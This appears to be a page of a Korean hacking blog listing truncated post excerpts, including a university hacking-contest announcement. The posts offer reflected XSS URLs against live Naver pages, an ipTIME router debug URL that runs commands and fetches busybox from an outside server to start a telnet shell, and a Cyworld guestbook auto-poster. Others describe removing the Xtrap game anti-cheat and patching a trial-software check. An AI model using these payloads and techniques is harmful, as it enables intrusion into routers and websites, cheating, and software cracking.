Security128 제 7회 2008 H.U.S.T Hack_Festival :: 제 7회 2008 H.U.S.T Hack_Festival :: 0x00 INTRO 안녕하세요. 홍익대학교 정보보안 동아리 H.U.S.T 입니다. 2007년도에 이어서 2008년도 제 7회 H.U.S.T 해킹대회를 개최하게 되었습니다 :) 여러분을 흥미진진한 Hacking_Festival에 초대합니다 ;p 0x01 Main_subject : H.U.S.T Hacking Festival - The Fair 0x02 The host organization : HONGIK UNIV(JOCHIWON) 0x03 Administer : 홍익대학교 조치원캠퍼스 동아리연합회 & 정보보안 동아리 H.U.S.T (Hongik University Security Team) 0x04 Whois Participants : .. 2008. 10. 7. 싸이월드 방명록등록기 팁 WebBrowser1.Document.parentWindow.execScript "window.confirm=function(){return true;}", "JavaScript" Set Bt = WebBrowser1.Document.getelementsbyname("write_btn")(0) Bt.Click 클릭하세염 음.. 싸이월드 방명록등록기만들때 핵심부분.. 작성하시겠습니까? 예 / 아니오 에서 자동으로 예를 선택후 바로등록하는부분이다.. 저부분때문에 애좀먹었찌.... 건탱이알려줌ㄳ 2008. 9. 2. 네이버XSS http://news.naver.com/news/main2.php?mode=LSS2D§ion_id="> >By+Narcoticxs http://rd.naver.com/i:1000001542/c:32129?javascript:alert(1) http://www.naver.com/r/m??javascript:alert(1); http://kin.naver.com/bridge.php?type=rd&rd_i=i:1000000486&rd_c=c:49515&ret_url=aHR0cDovL3hzc2VkLmNvb Q== http://news.naver.com/news/read.php?mode=LSS2D&office_id=018&article_id=0000521219§ion_id=102&se ction_i.. 2008. 9. 2. IPTIME 무선공유기 해킹 백도어에 대한 내용은 피해자를 유발할 수 있으므로 삭제했습니다. 디버그 모드에 관한 내용은 유용할 거 같아서 일단 놔둘 생각입니다. 이 기능은 계속 있었으면 좋겠네요. http://공유기주소/cgi-bin/timepro.cgi?flag=debug를 입력하면 이상한 놈이 나옵니다.(최신버전은 debug 대신 bluesky입니다..) 리눅스 명령어를 실행할 수 있습니다.(약간 불편하네요) 여기서 http라는 wget와 비슷한 역할을 하는 프로그램을 찾아서 busybox를 올린 뒤(내장 busybox는 기능이 얼마 없더군요) busybox에 들어있는 telnetd를 이용하여 putty로 접속했더니.. 셸을 띄울 수 있었습니다. /sbin/http get http://서버/busybox > /tmp/busybo.. 2008. 2. 12. Xtrap 제거 Xtrap는 온라인 게임에서 메모리 보호(디펜더)로 사용되는 보안 솔루션입니다. Xtrap는 게임 시작 부분에서 가장 먼저 로딩되는 보안 모듈이며, 치트엔진, 디버깅 툴, 및 기타 메모리 조작 프로그램이 로딩되는 것을 차단합니다. 특히, 디버깅툴이 실행되어 있으면 바로 블루스크린되면서 컴퓨터 리뷰팅 됩니다. 정말 무식한 방법입니다. 그러므로, 게임해킹 시 선행되어야 하는 것이 Xtrap과 같은 메모리 디펜더를 제거하는 것입니다. 제거 방식은 Xtrap를 사용하는 온라인 게임에서는 거의 비슷하나 약간이 다른 점이 있습니다. 대표적인 차이점은 Xtrap 로딩되었는지 주기적으로 체크하는 게임 루틴에 있습니다. 이만 각설하고, Xtrap를 사용하는 국내 온라인 게임 중에서 ABC(임의로 명칭을 지정함) 게임을 .. 2007. 12. 26. yoda's cryptor 언팩 FreeTrial 을 Unicode 로 검색 mov eax,1 을 mov eax,3 으로 바꿔줌 2007. 12. 7. 이전 1 ··· 4 5 6 7 8 9 10 ··· 22 다음
